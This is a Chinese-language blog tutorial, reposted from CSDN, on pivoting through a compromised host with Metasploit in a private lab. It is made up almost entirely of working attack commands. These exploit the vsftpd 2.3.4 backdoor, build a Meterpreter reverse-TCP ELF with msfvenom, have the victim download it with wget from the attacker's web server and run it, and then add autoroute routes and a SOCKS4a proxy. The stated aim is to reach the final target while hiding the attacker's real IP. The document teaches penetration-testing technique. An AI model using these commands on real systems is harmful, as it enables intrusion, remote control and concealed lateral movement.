1. 程式人生 > >滲透之——Meterpreter以被控制的計算機為跳板滲透其他伺服器

滲透之——Meterpreter以被控制的計算機為跳板滲透其他伺服器

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86475550

攻擊機:Kali 192.168.75.10

跳板: Metasploitable2 192.168.75.130

目標機: Windows Server 2012 192.168.75.140

這裡無法通過Kali(192.168.75.10)主機直接訪問目標機(192.168.75.140),目標機只能通過跳板(192.168.75.130)訪問,這裡Kali(192.168.75.10)已經成功滲透跳板(192.168.75.130)主機,需要將已滲透主機(192.168.75.130)設定為跳板來訪問目標機(192.168.75.140)。

如果直接通過攻擊機(192.168.75.10)訪問目標機(192.168.75.140),會出現如下錯誤:

這裡,跳板(192.168.75.130)擁有連線目標機(192.168.75.140)許可權。因此需要一些方法將我們對目標機(192.168.75.140)發起的請求通過跳板(192.168.75.130)轉發出去,需要的這種技術方法就是跳板技術。

這裡,我們首先要滲透跳板(192.168.75.130)主機。具體步驟如下:

1.開啟MSF

msfconsole

2.掃描指定主機的服務和埠

nmap -sV -p 21,22,25,80,110,443,445 192.168.75.130

如果要存入MSF的資料庫,則:

db_nmap -sV -p 21,22,25,80,110,443,445 192.168.75.130

3.列出在目標埠上執行的服務

services

4.過濾服務,只顯示開啟的服務

services -u

5.列出資料庫中所有的主機

hosts

6.漏洞攻擊

use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOST 192.168.75.130
set RPORT 21
show payloads
set payload cmd/unix/interact
exploit

注:所有操作都是在MSF終端下

這裡,我們繼續將Shell控制升級為Meterpreter命令列。

在攻擊機Kali上重新開啟一個終端:

7.生成反彈木馬

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST 192.168.75.10 LPORT 4444 -f elf > backdoor.elf

注:elf是Linux系統下的預設副檔名

8.啟動Kali上的Apache服務,並將backdoor.elf放置到伺服器中

service apache2 start
mv backdoor.elf /var/www/html/

這樣,就可以讓目標系統從我們的計算機中下載這個木馬檔案了。

9.在目標機上下載木馬檔案

切換到第6步的終端,執行命令:

wget http://192.168.75.10/backdoor.elf

即將木馬檔案下載到了目標機上

10.在新開啟的終端上執行如下命令

msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.75.10
set LPORT 4444
exploit

11.在目標機上執行木馬檔案

切換到第6步的終端,執行命令:

chmod 7777 backdoor.elf
./backdoor.elf

12.檢視反彈的Meterpreter終端

回到新開啟的終端上檢視,此時,我們看到已經反彈回Meterpreter命令行了。

接下來,就可以在Meterpreter終端進行操作了。

下面,我們需要執行autoroute指令碼,並使用-s將指令碼的引數設定為目標主機(192.168.75.140)的IP地址,這樣我們就可以在已經被我們滲透的跳板機(192.168.75.130)上新增一條到達目標主機(192.168.75.140)的路由。

13.新增路由

run autoroute -p
run autoroute -s 192.168.75.140
run autoroute -p

以攻擊者(192.168.75.10)的角度看,現在需要啟動一個可以將請求通過Meterpreter傳送給目標的模組。可以選擇auxiliary/server/socks4a這個模組。

14.啟動監聽

在攻擊機(192.168.75.10)上執行如下命令:

use auxiliary/server/socks4a
show options
set SRVHOST 127.0.0.1
set SRVPORT 1080
run

15.配置攻擊機(192.168.75.10)/etc/proxychains.conf

新增下面一行配置:

socks4 127.0.0.1 1080

16.配置Forefox代理

再一次開啟目標伺服器(192.168.75.140)的限制目錄下的網頁。

這裡,我們就可以訪問了。

接下來,我們訪問下目標伺服器(192.168.75.140)伺服器的IP記錄器,如下:

可以看到是跳板(192.168.75.130)的IP地址,不管我們對目標伺服器(192.168.75.140)做了什麼,對目標伺服器(192.168.75.140)眼中這一切都是跳板機(192.168.75.130)做的。然而,我們的真實IP確是192.168.75.10。